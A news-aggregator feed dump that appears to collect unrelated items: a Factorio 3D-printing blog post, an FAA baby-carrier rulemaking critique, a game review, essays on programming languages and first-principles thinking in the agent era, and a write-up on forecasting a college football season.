There is one more issue recreating models made for an isometric game - and that is the dark spaces. Just like the dark side of the Moon, the back-sides of our machines are filled with horrors and sleeping eldritch-gods. Do not worry, though - I did replace them with freshly imagined, safe machinery :)

Partaking in this journey was surely one of the most interesting challenges in my career. I would love to thank Wube and Prusa for making it possible - as well as for the enthusiasm they shared! I honestly do hope more studios decide to share their work in such a way (looking at you, certain team of astronauts!)

Special thanks go to my colleague, Pard, for his insatiable hunger to test my models. May thy filament never runeth dry, good sir!

Inserters 1 Inserters 2 Inserters 3 Inserters 4 Inserters 5 Inserters 6



Designing enemies Fearghall

While Jarosław toiled away hand crafting belts and assemblers and failing his "lazy bastard" run in the process, I set about the task of bringing the "organic" entities to life. Thankfully for me, I was able to avoid the pain of the isometric perspective because most of the organic entities have fully rotating spritesheets, and so the models are complete from most angles without too many tricks of the camera.

However, the models were still designed for pre-rendering only, and as such had some unique challenges. For example, the biter spawner was covered by an invisible skin, and almost all of the detail in the in-game images was confined to the texture data - something that cannot be transferred to a 3D printable file. However, after a week or so of cleaning up and baking out the model, it now prints very well with no support or issues.

It also became immediately obvious that most of the organic prints could not be made support-free like Jarosław has done so well with all the machines. The geometry is simply too complex, and many of the parts would be far too small to print and attach together. I still endeavoured to make them easily printed, however. The idle engineer pose, for example, has printed without supports many times, and the worm poses (aside from the 90-degree attacking pose) print entirely without support. But alas, there are some things which are simply impossible to print without support, such as the running pose.

Biter Spawner 1 Biter Spawner 2 Worm 1 Worm 2 Worm 3 Worm 4 Worm 5

One of the main issues with the character and biter family was the damage left by the support interface. The surface where the print and support meet can be quite ugly, so I was keen that none of the models should require so much support as to impact the visual quality.

With the engineer it was quite simple, the backpack needed to be split off, and there needed to be a slot and pin added, but otherwise a slight angle was all that was needed for decent printing.

Player Character 1 Player Character 2 Player Character 3 Player Character 4 Player Character 5 Player Character 6

With the biter family however, there was a little more work. There was the big issue of the legs: they would absolutely not have printed in the "correct" orientation, and splitting in the centre of the biter and leaving a large seam was an absolute non-option. So the only sensible solution was to print them upside down! Simply printing them like this as a single part would likely have worked, but would have left horrible scarring on the most visible surface of the model, so I decided the shell needed to become its own part so it could be correctly oriented. This also had the benefit of meaning the shells are easily printed in the correct colour for the biter size!

Biter 1 Biter 2 Biter 3 Biter 4 Biter 5 Biter 6

With that in mind, I could arrange all the biter legs to require as little support as possible in the new orientation, and merged a few of the legs for added strength - bearing in mind that they would need to stand on their own legs in reality. In order to make the shells attach, I sculpted in some extra reliefs and ensured both surfaces had just the right level of clearance. The final result has almost no visible support interfacing, and a very satisfying "snap!"

Spitter 1 Spitter 2 Spitter 3 Spitter 4 Spitter 5


Where to download? Pard

All models are available to download right now from our Prusa Brands profile on Printables . Special thanks go to Štěpán Feik, who helped us make all of this happen. From joining us at our playtesting event to helping us cross the finish line this morning, he has been part of the journey throughout. You can read his take on our collaboration here .


As always, let us know what you print at the usual places.

Microsoft Abandons Personal AI Chatbot Race with Copilot Reboot

Hacker News
www.bloomberg.com
2026-09-25 10:07:08
Comments...
Original Article

We've detected unusual activity from your computer network

To continue, please click the box below to let us know you're not a robot.

Why did this happen?

Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .

Need Help?

For inquiries related to this message please contact our support team and provide the reference ID below.

Block reference ID:403d3224-b8fb-11f1-805f-079d7c1a803b

Get the most important global markets news at your fingertips with a Bloomberg.com subscription.

SUBSCRIBE NOW

Allow Carriers on Planes

Hacker News
www.jefftk.com
2026-09-25 10:00:10
Comments...
Original Article

The FAA has one of my favorite examples of thoughtful rulemaking. They haven't banned flying with a baby on your lap, because the extra cost would mean many parents would drive instead. Since driving is far less safe than flying, a ban would lead to more deaths. I'd love to see more of this "all things considered" thinking around bans.

In fact, one specific place where I'd like to see this thinking applied is adjacent to this rule: babywearing carriers on planes. When our babies were little, carriers were massively helpful in flying. The baby likes it, and your arms are free. But for takeoff and landing, the FAA requires you to take your baby out of the carrier and hold them in your arms.

The rule is that if an under-two is going to ride on a lap, they must not "occupy or use any restraining device," ( 14 CFR 121.311.b.1 ) and FAA guidance to parents is clear: "Baby carriers ...are not allowed to be used during ground movement, take-off, or landing."

This goes back to 1995, and if you look at the notice of proposed rulemaking it says:

This notice proposes to withdraw FAA approval for the use of booster seats and vest- and harness-type child restraint systems in aircraft during takeoff, landing, and movement on the surface. ... The FAA believes that, during an aircraft crash, the banned devices may put children in a potentially worse situation than the allowable alternatives.

This is based on their 1994 study , where the FAA compared child restraint options. They looked at "booster seats, forward facing carriers, aft facing carriers, a harness device, a belly belt, and passenger seat lap belts." The "carriers" here are car seats; they didn't test babywearing carriers. I don't think that's a major flaw in the study, however, since I do expect babywearing carriers would have performed poorly. [1] The real problem is that they didn't test the most common alternative, holding the baby in your lap. So "may put children in a potentially worse situation than the allowable alternatives" seems clearly wrong to me.

In the 1996 final rule [2] they discuss why they're making a different decision than the UK (CAA) and Europe (JAA, predates EASA), and they avoid the obvious comparison. They say belly belts can be dangerous, acknowledge that lap-holding has risks, predict parents will buy a second seat, and then also say they don't want to require a second seat because people will drive. This isn't completely nuts, since it's possible that allowing belly belts would have caused some parents to choose them over a second seat. It's pretty unlikely for the effects to balance out in just this way, however, and I don't see any indication that they tried to do this balancing.

I expect that, if fairly evaluated, modern babywearing carriers would prove much safer than arms during turbulence, crashes, and evacuations. And I think this is likely enough that if we're not going to do these tests we should default to not banning carriers. In 2024 there was a bill proposing to do something like this (Rep Bill Posey's HR 8972 ), but it went to the aviation subcommittee and died without a vote.

I don't think the harm of the current rule is very large in the scheme of things: flying is very safe, even for unrestrained lap infants. Most of the harm is probably the inconvenience of waking happily sleeping babies. Still, it bugs me as a clear example of incoherent rulemaking. The FAA sensibly considered substitution behavior in deciding not to ban lap infants, but failed to balance it here.


[1] The closest thing to a carrier they tested was a 'belly belt': "This belt is designed to be buckled around the child's abdomen and is secured to an adult's abdomen with the adult's safety belt by routing the safety belt through a small loop of webbing sewn on the belly belt." They did not perform well: "In the test, these systems allowed the anthropomorphic test dummy to make severe contact with the back of the seat in the row in front of the test dummy. The child also may be crushed by the forward bending motion of the adult to whom the child is attached."

[2] Here's the section, if the PDF is hard to load or read:

CAA and JAA state that they permit the belly belt on the grounds that it provides a measure of protection to children and/or other passengers versus lap holding a child.

FAA Response: The FAA would like to emphasize that belly belts are not permitted under current regulations. Even if belly belts do provide some measure or protection, the CAMI study found that belly belts allowed the test dummy to make severe contact with the back of the seat in the row in front of the test dummy and that a child may be crushed by the forward bending motion of the adult to whom the child is attached. Consideration of revising this current prohibition is beyond the scope of the notice.

The JAA also stated that in a crash or severe air turbulence, parents are often unable to keep a lap-held child in their arms.

FAA Response: As discussed earlier, the FAA has determined that mandating child restraint devices could cause more deaths and injuries than it would prevent. However, the FAA does not encourage lap-holding children. The FAA expects, with its education campaign providing clear guidance on child restraint devices, parents will choose an approved device, rather than lap holding their children, in order to provide the safest traveling environment for their children. The two members of the APCS Working Group submitted identical letters that discussed the need to mandate restraints for children. In addition, they stated that the FAA's argument that the extra cost to families caused by mandating child restraint devices would force them to less safe road travel is invalid since the same cost situation arises when the child is 3 or 4 or 10 years old.

FAA Response: The APCS Working Group's argument is that the extra cost to families of mandating child restraint devices is no more of a deterrent to air travel than the price of a ticket for a child of any age. However, the FAA notes that this argument does not take into account that ordinarily there is no charge for a lap-held child, whereas certificate holders very often do charge if a seat is requested for this infant. Thus, many people would switch to less safe automobile travel as a result of mandating child restraint usage because unlike most rulemakings where the compliance costs are passed along to all travelers, mandatory use of child restraint would impose compliance costs only on families with infants.

Ace Combat 8: Wings of Theve review – brilliant aerial combat game fulfils the Top Gun fantasy

Guardian
www.theguardian.com
2026-09-25 10:00:08
PlayStation 5, Xbox, PC (version played); Bandai NamcoThe game generates blood-pumping moments as you twist, turn and weave through the skies, while your locked-on missiles speed away to obliterate an enemy plane The core appeal of any Ace Combat game lies in the moment when the beautiful clouds par...
Original Article

T he core appeal of any Ace Combat game lies in the moment when the beautiful clouds part, the sunlight glints off your perfectly rendered state-of-the-art fighter jet, and guitar-shredding music kicks into overdrive as your locked-on missiles speed away to obliterate an enemy plane. All of that is 100% present in Ace Combat 8: Wings of Theve. What’s new is the way it delivers its unexpectedly compelling story.

Set in the Earth-like alternative world of Strangereal, where every country is absolutely obsessed with fighter planes and giant superweapons, Ace Combat drafts you into the role of a fake ace pilot called the Wings of Theve – a propaganda invention to raise the morale of a besieged nation, similar to real-life rumours about Ukraine’s Ghosts of Kyiv . You rapidly find yourself becoming an actual legendary pilot, soaring through the skies with your buddies and raining hell upon your oppressors as everybody cheers on the radio. Speaking of ghosts, you have one in your ear – your predecessor, whom nobody else can hear, a gravelly voice waxing lyrical about flying, war and whatever else is on his mind as you flit about.

Despite slavish devotion to the accurate depiction of military hardware, Ace Combat has always been more concerned with making flying fun than sticking to realism. Simplified, more intuitive controls and training scenarios are available to help ease beginners into the pilot’s seat, while as a series veteran I was happier with the expert control scheme, which opens up more complex manoeuvres like missile-evading rolls and zero-G turns. Importantly, the simple act of flying around looks astounding; action replays unerringly choose the best camera angles to make you look like a true ace (instead of someone simply doing their best not to smash straight into the ground).

This is a game all about dogfighting, but there’s a pleasing variety of mission types ranging from bombing runs and escorts to more convoluted scenarios such as taking out a giant, railgun-equipped “land battleship” rampaging through a city’s streets, or hunting radar-invisible supersonic planes by trying to spot their tell-tale contrails. It’s all thrilling stuff; the game is perfectly tuned to generate high-tension, blood-pumping moments as you twist, turn and weave through endless rains of missiles while an orchestra goes absolutely wild and a well-produced radio drama plays out over the open airwaves.

It can all get a little confusing in the heat of battle, especially in the first-person cockpit view (which I otherwise highly recommend). Deciphering what the game is telling you to aim for next amid the visual clutter can be a trial – a button to target priority mission objectives directly wouldn’t have gone amiss. The clouds, too, can disorientate; I have never seen skies as gorgeous before, but you’ll soon learn to read the atmosphere for its tactical considerations as much as for its beauty.

Gameplay innovations are more incremental than sweeping. You can issue commands to your wing-mates, as in much earlier games in the series, but new to AC8 is environmental destruction. Some buildings and vehicles crumble when damaged: falling debris or explosions can trigger devastating chain reactions and you are no longer forced to target weak points to do damage to larger vessels, though it usually remains more efficient. Your plane can also glance off surfaces, taking a bit of damage, which is a relief; in previous entries you would explode instantaneously if your wing so much as clipped a tree branch.

Ace Combat 8: Wings of Theve.
Impactful … Ace Combat 8: Wings of Theve. Illustration: Bandai Namco

Larger, more impactful changes are reserved for how the game tells its story. AC7’s cut-scenes were closer to motion comics than movies, which worked fine for mission briefings but less so for anything involving human emotion. Here, fully animated first-person segments meld with more traditional cinematic cut-scenes (and some really effective smash-cuts between scenes) to really bring your wing-mates and the drama to life. Enemy incursions might occur during routine landings or refuelings, too, keeping you on your toes.

Ace Combat has always owed a debt to the movie Top Gun, and AC8 borrows liberally from the more recent sequel Top Gun: Maverick, with closeup pilot face-cam shots and a handful of story beats lifted straight from the film. Dialogue can be a bit clunky (again like Top Gun, or perhaps Metal Gear Solid); characters will occasionally pause midway through an otherwise natural-sounding conversation to deliver some convoluted plot exposition or an ideological clanger. But between the truly amazing shot framing and cinematography, emotive motion capture and voice acting, the series’ trademark soaring music and a story that actually sticks the landing, I ended up oddly moved. This is not something you necessarily expect from an arcade flight combat sim.

skip past newsletter promotion

Unfortunately I was unable to try the game’s online multiplayer mode, Ace Combat Online, which was only available for a very short time during the review period. But even leaving that aside, AC8 is a triumph, a perfectly composed symphony of fire and steel that absolutely soars.

Evolving programming languages in the AI era

Lobsters
dashbit.co
2026-09-25 09:59:03
Comments...
Original Article

This post is a collection of short ramblings on how programming languages may evolve in the AI era.

It is split into two parts: Reflections and Agentic tooling. The first raises questions about what happens to programming languages, their ecosystems, and their communities when humans are no longer writing most of the code. The second is more concrete and opinionated: how our tools should improve now that coding agents have become users of our languages.

My opinions on these topics will probably change, but this is a reasonable digest of what’s been on my mind lately.

Reflections

This section explores how programming languages and their communities might change if agents write most of our code. While this remains a contentious topic, it is already the reality for many developers and teams. Therefore, it is our responsibility to explore how this shift may affect us, regardless of how widespread we believe it will become.

Let’s get started.

On community

At the center of most programming languages, there is a community that rallies around a set of shared sensibilities. Python has its emphasis on an obvious way to do something. Ruby has long cultivated an appreciation for programmer happiness. Lisp communities have traditionally celebrated the ability to reshape the language itself.

But what happens when we stop writing most of the code? And how will that impact our sense of belonging? Is that something we should try to preserve or should communities find out what will be the next thing that glues them together?

Following on the same lines, we build ecosystems around languages to tackle hard problems and create shared abstractions: web frameworks, tensor libraries, data-processing pipelines, GUI toolkits, and so on. Coding agents may affect these ecosystems in two opposing ways.

First, the gap between ecosystems may get smaller. Building all of these frameworks requires a considerable amount of time and effort, much of which agents can potentially trim down. This is especially true when the problem involves implementing known algorithms, translating ideas from papers, or porting existing implementations between languages, allowing smaller communities to catch up with larger ones much more quickly.

On the other hand, if implementing something becomes cheap enough, will people still join efforts and collaborate on the same solution? If I need a library to solve problem X, I might just ask an agent to build exactly what I need.

This creates an interesting tension. Coding agents could dramatically reduce the cost of building an ecosystem while simultaneously weakening one of the forces that causes ecosystems to form in the first place.

On ergonomics

A reasonable chunk of how programming languages evolve is through adding syntactic affordances and improving ergonomics over time. However, if humans are no longer writing most of the code, how much do these changes matter?

For example, over the last decade, we saw an influx of languages adding optional chaining operators which are considerably nicer for a human to write than a sequence of explicit null checks. On the other hand, agents are not bothered by boilerplate and the difference is much less meaningful.

There is an argument that these affordances also make coding agents more token-efficient. But I’d argue that token efficiency is at the tail end of the characteristics we should optimize programming languages for, especially as models become cheaper, more efficient, and context windows grow larger.

I’d go as far as saying that any new programming language that claims to be made “for coding agents” and ultimately focuses on syntax is effectively building around today’s limitations. I have used agents to write HTML, CSS, JavaScript, Elixir, Rust, and Lean, and the differences in syntax that feel enormous to me seem considerably less important to them. From their perspective, it is all tokens-in, tokens-out.

On compilers

Whenever we discuss programming languages in this context, there is a common follow-up question: will we need programming languages in the first place? Perhaps coding agents will replace compilers and write assembly directly?

I don’t buy this version for a few reasons.

First, if you are building desktop application, you probably don’t want to maintain different assembly implementations for every architecture you support. You still want some architecture-independent representation and something capable of lowering it to the target machine. In other words, you have reinvented at least part of a compiler and a higher-level language, even if that language was never designed for humans to write.

Second, we have not found a single language or computational model that excels at everything. We have systems programming languages, theorem provers, languages for concurrent, distributed, and resilient software (e.g. Erlang/Elixir), query languages, hardware-description languages, and so on. They encode different semantics, different level of abstractions, with different guarantees. It is unreasonable to expect a single lower level language to unify all of those.

If programming languages are not going anywhere but we stop optimizing programming languages for the humans writing them, what should we optimize them for?

Agentic tooling

In the past, I have said that creating great tools for humans also leads to great tools for agents. I believe this will always be true. This has led us to build solutions that automate what we already do: agents write the same tests as us, consume the same program metadata as us, and read the same logs as us.

But what if we start using agents to perform actions we wouldn’t normally do ourselves? Perhaps because they are too tedious, have a steep learning curve, or require processing more information than is practical for a human? That’s what this section explores.

The tools in this section does not require agents to be writing most of the code. Even if you use agents for only 20% of your code, they could benefit from the tools outlined here.

Stronger guarantees over user constraints

Programming languages balance several competing goals, among them expressiveness, guarantees, and ergonomics. We want to express the programs we care about, we want the language to establish useful properties about those programs, and we want to make it accessible to developers. If agents are writing most of the code, we can revisit these trade-offs.

One such example is the inference of function signatures. This is valuable to humans because explicitly writing information the compiler can infer is tedious. Coding agents don’t care about tedium. If anything, making types and intentions explicit gives the compiler, other agents, and ourselves more information to work with. More importantly, the languages whose types can be fully inferred are generally a subset of those whose types can be checked, so optimizing for inference can ultimately limit both expressiveness and the guarantees a type system can provide. Why impose those limits on agents when we’ve already seen them capable of writing proofs in much more complex systems?

Guarantees don’t always have to be statically established either. Memory safety may be enforced statically or by the runtime, such as through garbage collection. Model checking can bridge models and implementations by using model-generated execution traces to validate the actual system. Case in point: Erlang/Elixir rely on isolated processes and message passing to constrain how concurrent programs are structured, trading some expressiveness for stronger properties around isolation and fault tolerance. Not every concurrent algorithm maps efficiently to this model, but programs that do inherit useful guarantees from it.

Overall, there has never been a better time to provide stronger guarantees about our software. We are not able to formally verify all software, but we can combine different approaches to strengthen it:

  • Correct by construction: the language makes invalid states or programs hard or impossible to express.
  • Statically established: types, proofs, and static analysis establish properties before execution.
  • Runtime-enforced: memory management, isolation, capability boundaries, and other runtime enforced properties.
  • Empirically validated: program validation through tests, property-based testing, and fuzzing.

I believe the different ways languages combine these techniques and push the boundary between expressiveness and guarantees will play an increasing role in how they differentiate themselves and are adopted. Especially if you believe agents will make it easier for ecosystems to catch up with one another, as discussed in “On community”. On a similar note, frameworks must also adopt some of those practices at their own level of abstraction.

Program databases over LSPs

The death of IDEs has been pronounced several times over the last two years. Once the obituary is finally published, I don’t expect LSPs to survive either.

The Language Server Protocol was designed primarily for IDEs, and many of its operations are biased towards documents and positions: file, line, and column, which agents do not track precisely. In our experience building Tidewave , a CLI or tool where agents can ask “where is the documentation for foo_bar ?” or “where is BarBaz defined?” is far more suitable than requiring them to provide a precise reference to where those symbols appear in the source code.

Furthermore, LSPs were designed to present information for human consumption rather than exploration. You gather information one piece at a time by hopping between source files.

The good news is that many language servers already build, or have access to, much of the information coding agents need: symbols, references, call graphs, type information, and sometimes data-flow information. My suggestion is to expose this information as a program database with a query language, be it SQLite, Datalog, or a custom DSL.

It would be unreasonable to ask most developers to write a query just to find all references to a function. Coding agents, on the other hand, would gladly do so: writing a program query is the same amount of work as invoking a CLI or LSP tool. More importantly, they could compose queries that would be impractical to expose as individual IDE features: find all public functions that eventually call this function or all paths through the program where a given value can become nil . Those databases could also be used as linters to guard agents against undesired practices.

This implies that locality remains extremely important, especially in large codebases. Features such as monkey-patching, implicit hooks, dynamic rebinding, and other forms of action at a distance mean that code written in one place can affect how the entire system behaves, in ways that are hard to trace even when program databases are available.

Runtime observability over debuggers

Debuggers are another interface designed primarily for humans. We set breakpoints, step through execution one line at a time, and inspect variables as we go. However, agents can instrument code, collect traces, and correlate information much faster than we can. We should give them interfaces that take advantage of that.

Furthermore, if the assumption is that coding agents are going to write most of our code, it is reasonable to expect them to also take on more responsibilities across the software development lifecycle, including monitoring and diagnosing production systems as they run, rather than relying on logs and dashboards.

We should expose the runtime and state in our systems in ways that agents can query and explore programmatically. Runtime observability can give agents a common interface to diagnose failures, identify reliability issues, and detect bottlenecks live across all environments.

Luckily, this is an area where Elixir has always excelled, thanks to the Erlang VM. Inspecting processes, sockets, applications, supervisors, ETS tables, message queues, and much more is a built-in capability of the runtime. The remaining gap is to expose these capabilities safely to agents, whether through a collection of tools, a query language, or a sandbox.


Acknowledgements: I want to thank Quinn Wilton, Chris McCord, Ryan Lopopolo, Chad Fowler, Rob Knight, Danila Poyarkov, and the multiple folks I met at ElixirConf for discussions and sharing work that has helped shape many of the thoughts in this article. All opinions are my own.

Disclaimer: AI was used to address stylistic and grammatical issues in the article.

First Principles Thinking

Hacker News
sunilsadasivan.com
2026-09-25 09:55:37
Comments...
Original Article
Hand-drawn diagram connecting asking why, putting experience in a box, first principles, and small learning loops that build momentum.

I’ve re-read Sunil Pai’s “the senior engineer death spiral” several times this week. It’s very good. If you haven’t read it, start there.

It’s resonating with me because I think almost every senior engineer has felt some version of being stuck. You get good at what you do, then things change, and the experience you’ve built up can make it hard to approach things differently.

(Also, still getting over the fact that this is a different Sunil in software engineering.)

Pai talks about focusing on momentum instead of outcomes, and I fully agree. When I’m stuck, I break the work down to the smallest thing I can actually accomplish. Getting something done usually helps me figure out what to do next.

After sitting with his post, I kept coming back to first principles thinking.

I’ve been lucky to work with and manage a lot of great senior engineers. When I think about what made them great, I keep landing on the same thing: they seemed to know what needed to be done. There’s an intuition there that I’ve always admired.

Some of the best I’ve worked with came from customer support or services. Others taught themselves to code or started as designers or entrepreneurs. They took different paths into engineering, but they shared a habit of thinking from first principles.

They’d ask why we were building something and what it would do for the people using it. They could connect what was happening in the codebase to what was happening outside it. That understanding helped them keep things simple.

I think that’s another way to build the momentum Pai describes. Consider the simplest thing you could do first. It’s often enough.

Transitioning to the agentic era

I’ve had a lot of conversations with friends and coworkers about the shift to agentic development. The people who seem to be vibing with it are usually the ones who already think this way.

This is the first major “simulation switch-up” where I’ve really had to embrace how much I don’t know. The engineers I see keeping up with what’s possible are willing to put what they know in a box for a while as they work with agents. They’ll try something before assuming an old constraint still applies.

Put it in a box

This is the hard part for me. Take your experience, what you’ve learned, and what you currently believe is true, and set it aside long enough to look at the problem again.

I still want to draw on that experience. But it’s easy to let a past project or a familiar technical limitation decide the answer before I’ve understood the problem in front of me.

When I step back and ask what we’re actually trying to do, why it matters, and how the pieces connect, I usually find more ways forward than I expected.

There’s been a lot of talk about what’s real with AI and what’s inflated. I think if you set your experience aside and look at what’s possible with fresh eyes, there’s a whole lot to admire, and a lot worth rethinking. Approaching it from first principles means starting with what we’re trying to do and asking how AI could help. It’s easy to get excited about the technology before you’ve answered that question.

That brings me back to the momentum Pai describes. First principles thinking makes working that way feel natural. When you truly understand what you’re trying to accomplish, it’s easier to take a small step, learn from it, and keep going. If you’re doing it right, working with agents lets that back-and-forth happen much faster. You get faster learning loops and more momentum, oriented around deep understanding. To me, that’s the new flow state.

Long Live Human Thinking.

ASML says it sold 'absolutely nothing' in Europe in 2026

Hacker News
www.tomshardware.com
2026-09-25 09:49:06
Comments...
Original Article

As the world's only supplier of EUV lithography systems, ASML is Europe's largest company by market capitalization, currently valued at around $660 billion. But it earned almost nothing in Europe this year, down from 1% of total profits in 2025 and 5% in 2024. Why? European chipmakers bought no lithography equipment from ASML in 2026 — and the company is calling on EU authorities to help create demand for European chips.

Get Tom's Hardware's best news and in-depth reviews, straight to your inbox.

What happens when you analyze your favorite college football team like the CIA?

Hacker News
www.cultivatelabs.com
2026-09-25 09:47:21
Comments...
Original Article

A couple weekends ago, the Illinois football team lost to Duke at home, 31–27. My Hinsley model immediately became much less optimistic about Illinois making the College Football Playoff.

But it became more optimistic about the offensive line and our new quarterback.

That sounds contradictory, but it's exactly what I wanted to happen.

For the past 15 years, we've worked with people whose job is to make judgments about uncertain futures: intelligence and government analysts, foreign-policy researchers, investors, and corporate strategists. This year I decided to try an experiment. I took the methodology we've developed for that kind of work and applied it to something considerably less consequential: assessing the fortunes of the University of Illinois football team.

To understand why, it helps to think about what an intelligence analyst actually does.

How intelligence analysts think

During the Cuban Missile Crisis, American intelligence analysts were trying to understand what the Soviet Union was doing in Cuba. They had a growing collection of evidence, but the difficult part was deciding what it meant. Analysts had to consider competing explanations, identify the observations that distinguished one from another, and revise their assessments as new evidence arrived. Eventually, U-2 photography provided much stronger evidence that the Soviets were installing nuclear missiles.

The stakes are obviously rather different, but the analytical problem is surprisingly general. Usually there isn't one fact that gives you the answer. There are several possible futures, a huge amount of imperfect information, and a smaller number of things that actually help distinguish among them. The analyst's job is to impose structure on all of this without becoming more certain than the evidence warrants.

You find versions of this problem everywhere. A foreign-policy analyst might be trying to understand whether a conflict will escalate. An investment analyst might be thinking about how geopolitics, regulation, or a new technology will affect an asset over the next decade. A government analyst might be assessing how another country will respond to a policy change. The useful question isn't simply, "What do I think will happen?" It's: What are the plausible ways this could turn out? What would have to be true for each of them? What should I be watching? And what new evidence would cause me to change my mind?

It's not broadly known, but for more than a decade, Cultivate ran a prediction market for the U.S. Intelligence Community, giving analysts a way to make and aggregate probabilistic forecasts about geopolitical and national-security events. More recently, our work has expanded beyond forecasting individual questions into the broader analytical process around them.

That's what led us to develop Continuous Probabilistic Foresight , or CPF, the methodology at the heart of Hinsley , our AI/human hybrid analysis platform. CPF starts with a strategic question and maps the range of plausible outcomes as scenarios. It decomposes the problem into the drivers and indicators that would make those scenarios more or less likely, makes assumptions explicit, and turns important uncertainties into resolvable forecasting questions. As new evidence arrives, those forecasts and the larger assessment can change with it.

The idea isn't to build a crystal ball. It's to maintain a structured, explicit view of an uncertain future, and to know why your view changes when the evidence does.

Which brings me back to Illinois football.

Building an intelligence model for Illinois football

Having grown up in Champaign, I'm a lifelong Illinois fan, and college football turns out to be almost comically well suited to this kind of analysis. A season is an uncertain future surrounded by an enormous amount of information that is constantly evolving. We have preseason recruiting, game results, injuries, competitor performance, statistics, coaching changes, on-field performance, preseason models, beat reporting, podcasts, and endless amounts of informed and uninformed commentary. We know some things with reasonable confidence, have strong opinions about others, and are almost certainly wrong about a few things we currently regard as obvious.

So instead of just following the season the way I normally would, I asked Hinsley to follow Illinois the way an analyst might follow a country, company, market, or strategic issue.

I started a couple months ago with the question I think most Illinois fans are ultimately trying to answer before a season: What is the ceiling this season for the University of Illinois football team?

From there, I let Hinsley get to work.

Its research agent began collecting information about the team: returning players, transfers, recruiting, injuries, coaching changes, position-group strengths and weaknesses, the schedule, preseason models, and so on.

Its findings were that this outside view was fairly optimistic. Illinois had won 19 games over the previous two seasons, and Hinsley's research suggested a 10-win regular season and a possible College Football Playoff berth represented a plausible ceiling. But there were obvious reasons it might not happen. Illinois was replacing Luke Altmyer at quarterback, returning only one starter on the offensive line, and replacing a lot of defensive experience under a new coordinator.

There was also a particularly interesting warning buried in the research: Illinois had won 13 one-score games over the previous three seasons. Maybe Bret Bielema's teams are unusually good at winning close games. Or maybe some of that was luck that wouldn't continue forever.

That's exactly the kind of thing I wanted this exercise to expose. Instead of saying, "Illinois has won nine games two years in a row, so they'll probably be good again," I now had a set of assumptions hiding underneath that belief.

The next step was to ask Hinsley to turn the big question into four scenarios for how the season could end, and generate initial likelihoods for each of those scenarios based on everything it knew at that point.

But scenarios and even their associated probabilities by themselves aren't especially useful if you can't explain why one is becoming more likely and another less likely. So I built what we call a decomposition: essentially a map of the things that could meaningfully affect which scenario we ended up in.

Mine had nine broad categories. They included the quarterback transition, offensive-line continuity and health, whether the defense could reload, performance against the best teams on the schedule, execution in toss-up games, how quickly transfers gelled, whether key players stayed healthy, special teams and possession margin, and the possibility of some unexpected roster or eligibility shock. Underneath those were much more specific things Hinsley could actually watch: Houser's completion and interception rates, sacks allowed, third-down defense, turnover margin, one-score results, injuries, and so on.

This was the point where it started to feel less like having an opinion about Illinois and more like having a model of Illinois. Not a statistical model in the traditional sense, but a structured description of what would have to go right for the team to have a great season, what could prevent that from happening, and what evidence would tell me which direction we were heading.

For a handful of the most important uncertainties, I went another step and turned them into forecast questions. Will Illinois allow 30 or fewer sacks this season? Will it finish with a turnover margin of at least +7? Will opponents convert fewer than 40% of their third downs? Will Katin Houser complete at least 64% of his passes while keeping his interception rate below 2.5%? Will Illinois finish in the top 12 of the final College Football Playoff rankings?

Here's an example you can follow along with and see the latest results.

In truly trying to assess the future performance of the team, those questions are much more useful to me than the endless debate on my message board subscription asking whether the offensive line is "good" or whether Houser is "playing well," because eventually there will be an answer. Hinsley's AI forecasting ensemble puts probabilities on them, and I can make forecasts myself or invite friends to do the same. Over time, I can compare what the AI thought, what a bunch of Illinois fans thought, and what actually happened.

You can see the entire model here:

Then Illinois lost to Duke

A home loss like that tends to produce a fairly predictable response from fans. The team isn't as good as we thought. The season outlook is worse. It can be entertaining to vent and read others doing the same, but it's not very rational.

Hinsley reacted differently because the game contained several distinct pieces of evidence. Illinois's chances of finishing in the top 12 of the final CFP rankings dropped, from 8% before the game to 4% afterwards. That makes sense: if you're already an outsider trying to get into the playoff, losing at home to Duke uses up a lot of your margin for error.

But some of my forecasts moved in the opposite direction. One of the biggest preseason concerns about the team was the offensive line, where Illinois was replacing almost everyone. I had created a forecast asking whether the team would allow 30 or fewer sacks over the season. After two games, including Duke, Illinois hadn't allowed a single sack. So despite losing the game -- and despite some injuries on the line -- the forecast went from 52% to 61%.

The same thing happened with Houser. I was tracking whether he could complete at least 64% of his passes while throwing interceptions on no more than 2.5% of his attempts. After Duke he was completing more than 71% of his passes with one interception in 52 attempts. His forecast improved from 37% to 42%.

Meanwhile, the forecast that Illinois would finish with at least a +7 turnover margin fell from 29% to 22%. Illinois had lost the turnover battle and was now sitting at even for the season.

Put those four movements next to each other and you get a much richer context of what happened and where the season could still head than "Illinois lost to Duke at home, we're f*^&ed":

CFP Top 12: 8% → 4% ↓

30 or fewer sacks: 52% → 61% ↑

Houser efficiency: 37% → 42% ↑

+7 turnover margin: 29% → 22% ↓

This, more than anything, is what I like about the approach. A loss is obviously important, but it doesn't follow that everything you believed about the team should move in the same direction. The playoff outlook got substantially worse. The evidence about pass protection got better. The evidence about Houser got somewhat better. The turnover outlook got worse.

The question isn't simply whether the latest piece of news is "good" or "bad." It's which parts of your model that new evidence should actually change.

In a very low-stakes way, that's the same analytical habit I described earlier. Start with several possible futures and work backward to the things that would make one more likely than another to make the important uncertainties explicit. Then when new evidence arrives, update the beliefs that the evidence actually bears on rather than allowing one dramatic event to overwhelm the entire analysis.

And because the structure is already there, I don't have to rebuild my view of Illinois every Sunday morning. The research keeps running, the forecasts keep updating, and the scenario probabilities change as new evidence comes in. Each week I can see not only what changed but why it changed.

It also gives me something I've never really had as a fan: a running record of what I believed about the team and why I believed it. That's surprisingly useful because sports fans are very good at rewriting history. After a player breaks out, it quickly starts to feel as though everyone knew he would be good. After an upset, all the warning signs suddenly seem obvious. Forecasting forces you to track what you actually thought before you knew the answer.

What else could you do with this?

I'm not much of a sports bettor, but there is an obvious application there too. If I were betting on games or trading on Kalshi or Polymarket, I'd be less interested in whether Hinsley thought Illinois would win than in places where its probability differed meaningfully from the market's. A disagreement gives you something to investigate: what does my analysis believe that the market apparently doesn't? I'd record those disagreements before the games and then keep score. Over enough predictions, I'd find out whether I had discovered an actual informational advantage or merely a more elaborate way of expressing my fandom.

There are more serious sports applications as well. If I were working for a Big Ten football program, I might have an analysis like this running for every other team in the conference. A research agent could continuously follow each program, maintain a structured assessment of its strengths and weaknesses, track important uncertainties, and flag meaningful changes. Coaches and analysts would still make the judgments, but they wouldn't have to spend as much time finding and organizing the information in the first place.

